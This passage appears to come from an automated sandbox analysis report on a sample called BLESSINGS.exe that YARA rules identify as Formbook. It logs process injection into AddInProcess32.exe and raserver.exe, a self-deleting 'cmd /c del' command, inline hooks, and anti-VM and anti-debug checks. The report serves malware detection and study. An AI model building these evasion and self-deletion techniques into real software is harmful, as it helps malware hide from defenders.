          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_018022AE8_2_018022AE
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01730D208_2_01730D20
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_018025DD8_2_018025DD
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01802D078_2_01802D07
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0174D5E08_2_0174D5E0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01801D558_2_01801D55
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017625818_2_01762581
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017FD4668_2_017FD466
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0174841F8_2_0174841F
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0180DFCE8_2_0180DFCE
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01801FF18_2_01801FF1
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01756E308_2_01756E30
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017FD6168_2_017FD616
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01802EF78_2_01802EF7
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0453841F15_2_0453841F
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045E100215_2_045E1002
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0453B09015_2_0453B090
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045520A015_2_045520A0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045F20A815_2_045F20A8
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045F1D5515_2_045F1D55
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0452F90015_2_0452F900
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04520D2015_2_04520D20
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0454412015_2_04544120
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0453D5E015_2_0453D5E0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0455258115_2_04552581
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04546E3015_2_04546E30
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0455EBB015_2_0455EBB0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_001EE19715_2_001EE197
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_001D2D9015_2_001D2D90
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_001D2D8715_2_001D2D87
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_001D9E3F15_2_001D9E3F
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_001D9E4015_2_001D9E40
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_001EDF9715_2_001EDF97
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_001D2FB015_2_001D2FB0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_001EDFAA15_2_001EDFAA
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe 23F4A2CCDCE499C524CF43793FDA8E773D809514B5471C02FA5E68F0CDA7A10B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 0452B150 appears 35 times
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: String function: 0173B150 appears 35 times
          Source: BLESSINGS.exeBinary or memory string: OriginalFilename vs BLESSINGS.exe
          Source: BLESSINGS.exe, 00000001.00000002.429031848.0000000005240000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs BLESSINGS.exe
          Source: BLESSINGS.exe, 00000001.00000002.429884886.0000000005450000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRunPe6.dll" vs BLESSINGS.exe
          Source: BLESSINGS.exe, 00000001.00000002.427311961.0000000003E01000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSHCore1.dll0 vs BLESSINGS.exe
          Source: BLESSINGS.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.475413871.0000000001240000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.475413871.0000000001240000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.686287687.0000000000D10000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.686287687.0000000000D10000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.427502177.0000000004747000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.427502177.0000000004747000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.427774356.00000000048B2000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.427774356.00000000048B2000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.686153240.0000000000840000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.686153240.0000000000840000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.475179595.00000000010C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.475179595.00000000010C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/2@3/1
          Source: C:\Users\user\Desktop\BLESSINGS.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\BLESSINGS.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7012:120:WilError_01
          Source: C:\Users\user\Desktop\BLESSINGS.exeFile created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeJump to behavior
          Source: BLESSINGS.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\BLESSINGS.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: BLESSINGS.exeVirustotal: Detection: 45%
          Source: BLESSINGS.exeReversingLabs: Detection: 15%
          Source: unknownProcess created: C:\Users\user\Desktop\BLESSINGS.exe 'C:\Users\user\Desktop\BLESSINGS.exe'
          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exeJump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'Jump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32Jump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: BLESSINGS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: BLESSINGS.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
          Source: BLESSINGS.exeStatic file information: File size 3427840 > 1048576
          Source: BLESSINGS.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x344200
          Source: BLESSINGS.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
          Source: Binary string: AddInProcess32.pdb source: AddInProcess32.exe, raserver.exe, 0000000F.00000002.688878285.0000000004A2F000.00000004.00000001.sdmp, AddInProcess32.exe.1.dr
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000A.00000000.460948394.000000000DC20000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, raserver.exe, 0000000F.00000002.687497204.000000000461F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: AddInProcess32.exe, raserver.exe
          Source: Binary string: RAServer.pdb source: AddInProcess32.exe, 00000008.00000002.475617177.0000000001290000.00000040.00000001.sdmp
          Source: Binary string: AddInProcess32.pdbpw source: AddInProcess32.exe, 00000008.00000002.474933726.0000000000B62000.00000002.00020000.sdmp, raserver.exe, 0000000F.00000002.688878285.0000000004A2F000.00000004.00000001.sdmp, AddInProcess32.exe.1.dr
          Source: Binary string: RAServer.pdbGCTL source: AddInProcess32.exe, 00000008.00000002.475617177.0000000001290000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 0000000A.00000000.460948394.000000000DC20000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\BLESSINGS.exeCode function: 1_2_05454B71 push es; iretd 1_2_05455094
          Source: C:\Users\user\Desktop\BLESSINGS.exeCode function: 1_2_05450A2A push ds; ret 1_2_05450A51
          Source: C:\Users\user\Desktop\BLESSINGS.exeCode function: 1_2_054505E6 pushfd ; iretd 1_2_05450613
          Source: C:\Users\user\Desktop\BLESSINGS.exeCode function: 1_2_05454E9A push es; iretd 1_2_05455094
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0041CEB5 push eax; ret 8_2_0041CF08
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0041CF6C push eax; ret 8_2_0041CF72
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0041CF02 push eax; ret 8_2_0041CF08
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0041CF0B push eax; ret 8_2_0041CF72
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0178D0D1 push ecx; ret 8_2_0178D0E4
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0457D0D1 push ecx; ret 15_2_0457D0E4
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_001ED856 push esi; ret 15_2_001ED859
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_001ECEB5 push eax; ret 15_2_001ECF08
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_001ECF0B push eax; ret 15_2_001ECF72
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_001ECF02 push eax; ret 15_2_001ECF08
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_001ECF6C push eax; ret 15_2_001ECF72
          Source: C:\Users\user\Desktop\BLESSINGS.exeFile created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
          Source: C:\Users\user\Desktop\BLESSINGS.exeFile opened: C:\Users\user\Desktop\BLESSINGS.exe\:Zone.Identifier read attributes | deleteJump to behavior
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8F 0xFE 0xE2
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 00000000001D98E4 second address: 00000000001D98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 00000000001D9B5E second address: 00000000001D9B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_00409A90 rdtsc 8_2_00409A90
          Source: C:\Users\user\Desktop\BLESSINGS.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exeWindow / User API: threadDelayed 401Jump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exeWindow / User API: threadDelayed 9396Jump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exe TID: 5100Thread sleep time: -12912720851596678s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exe TID: 5100Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exe TID: 972Thread sleep count: 401 > 30Jump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exe TID: 972Thread sleep count: 9396 > 30Jump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exe TID: 5100Thread sleep count: 53 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 5336Thread sleep time: -54000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\raserver.exe TID: 6660Thread sleep time: -60000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: BLESSINGS.exe, 00000001.00000002.427311961.0000000003E01000.00000004.00000001.sdmpBinary or memory string: VMware
          Source: explorer.exe, 0000000A.00000000.457745545.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 0000000A.00000000.457496905.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: BLESSINGS.exe, 00000001.00000002.427311961.0000000003E01000.00000004.00000001.sdmpBinary or memory string: vmware svga
          Source: explorer.exe, 0000000A.00000000.458586378.0000000008540000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATA,
          Source: explorer.exe, 0000000A.00000000.450653153.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: BLESSINGS.exe, 00000001.00000002.427311961.0000000003E01000.00000004.00000001.sdmpBinary or memory string: tpautoconnsvc#Microsoft Hyper-V
          Source: BLESSINGS.exe, 00000001.00000002.427311961.0000000003E01000.00000004.00000001.sdmpBinary or memory string: cmd.txtQEMUqemu
          Source: explorer.exe, 0000000A.00000000.451742330.00000000063F6000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000A.00000002.701264945.0000000006302000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllte
          Source: BLESSINGS.exe, 00000001.00000002.427311961.0000000003E01000.00000004.00000001.sdmpBinary or memory string: vmsrvc
          Source: BLESSINGS.exe, 00000001.00000002.427311961.0000000003E01000.00000004.00000001.sdmpBinary or memory string: vmware sata5vmware usb pointing device-vmware vmci bus deviceCvmware virtual s scsi disk device
          Source: explorer.exe, 0000000A.00000000.450653153.0000000005D50000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: BLESSINGS.exe, 00000001.00000002.427311961.0000000003E01000.00000004.00000001.sdmpBinary or memory string: virtual-vmware pointing device
          Source: explorer.exe, 0000000A.00000000.451742330.00000000063F6000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: BLESSINGS.exe, 00000001.00000002.427311961.0000000003E01000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 0000000A.00000000.457496905.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: BLESSINGS.exe, 00000001.00000002.427311961.0000000003E01000.00000004.00000001.sdmpBinary or memory string: vmusrvc
          Source: BLESSINGS.exe, 00000001.00000002.427311961.0000000003E01000.00000004.00000001.sdmpBinary or memory string: vmtools
          Source: explorer.exe, 0000000A.00000000.456554446.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: BLESSINGS.exe, 00000001.00000002.427311961.0000000003E01000.00000004.00000001.sdmpBinary or memory string: vboxservicevbox)Microsoft Virtual PC
          Source: explorer.exe, 0000000A.00000000.450653153.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 0000000A.00000000.456554446.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 0000000A.00000000.457745545.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: explorer.exe, 0000000A.00000002.686806535.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: explorer.exe, 0000000A.00000000.450653153.0000000005D50000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_00409A90 rdtsc 8_2_00409A90
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0040ACD0 LdrLoadDll,8_2_0040ACD0
